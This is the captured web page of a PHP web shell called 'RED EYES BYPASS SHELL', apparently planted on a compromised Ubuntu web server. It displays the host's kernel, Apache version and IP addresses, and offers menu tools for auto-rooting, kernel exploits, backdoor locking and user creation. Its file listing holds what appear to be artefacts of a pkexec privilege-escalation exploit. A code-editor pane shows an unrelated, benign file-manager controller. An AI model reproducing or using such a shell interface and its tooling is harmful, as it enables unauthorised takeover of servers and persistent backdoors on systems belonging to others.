Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
controller /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
api.class.php
1.35
KB
-rwxr-xr-x
app.class.php
3.3
KB
-rwxr-xr-x
desktop.class.php
926
B
-rwxr-xr-x
editor.class.php
4.57
KB
-rwxr-xr-x
explorer.class.php
45.71
KB
-rwxr-xr-x
fav.class.php
1.77
KB
-rwxr-xr-x
pluginApp.class.php
6.01
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
setting.class.php
3.76
KB
-rwxr-xr-x
share.class.php
20.3
KB
-rwxr-xr-x
systemGroup.class.php
8.58
KB
-rwxr-xr-x
systemMember.class.php
16.05
KB
-rwxr-xr-x
systemRole.class.php
4.85
KB
-rwxr-xr-x
user.class.php
21.61
KB
-rwxr-xr-x
userShare.class.php
3.17
KB
-rwxr-xr-x
utils.php
17.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fav.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ class fav extends Controller{ private $sql; function __construct(){ parent::__construct(); $this->sql=new FileCache(USER.'data/fav.php'); } /** * 获取收藏夹json */ public function get() { show_json($this->sql->get()); } /** * 添加 */ public function add() { $name = $this->in['name']; $path = $this->in['path']; if($this->sql->get($name)){//已存在则自动重命名 $index = 0; while ($this->sql->get($name.'('.$index.')')) { $index ++; } $name = $name.'('.$index.')'; } $res=$this->sql->set( $name, array( 'name' => $name, 'path' => $path, 'ext' => $this->in['ext'], 'type' => $this->in['type'] ) ); show_json(LNG('success')); } /** * 编辑 */ public function edit() { $this->in['name'] = $this->in['name']; $this->in['path'] = $this->in['path']; $this->in['nameTo'] = $this->in['nameTo']; $newFav = $this->sql->get($this->in['name']); if(!isset($newFav['type'])){ $newFav['type'] = 'folder'; } //查找到一条记录,修改为该数组 $toArray=array( 'name'=>$this->in['nameTo'], 'path'=>$this->in['pathTo'], 'type'=>$newFav['type'] ); $this->sql->remove($this->in['name']); if($this->sql->set($this->in['nameTo'],$toArray)){ show_json(LNG('success')); } show_json(LNG('error_repeat'),false); } /** * 删除 */ public function del() { $this->in['name'] = $this->in['name']; if($this->sql->remove($this->in['name'])){ show_json(LNG('success')); } show_json(LNG('error'),false); } }
Close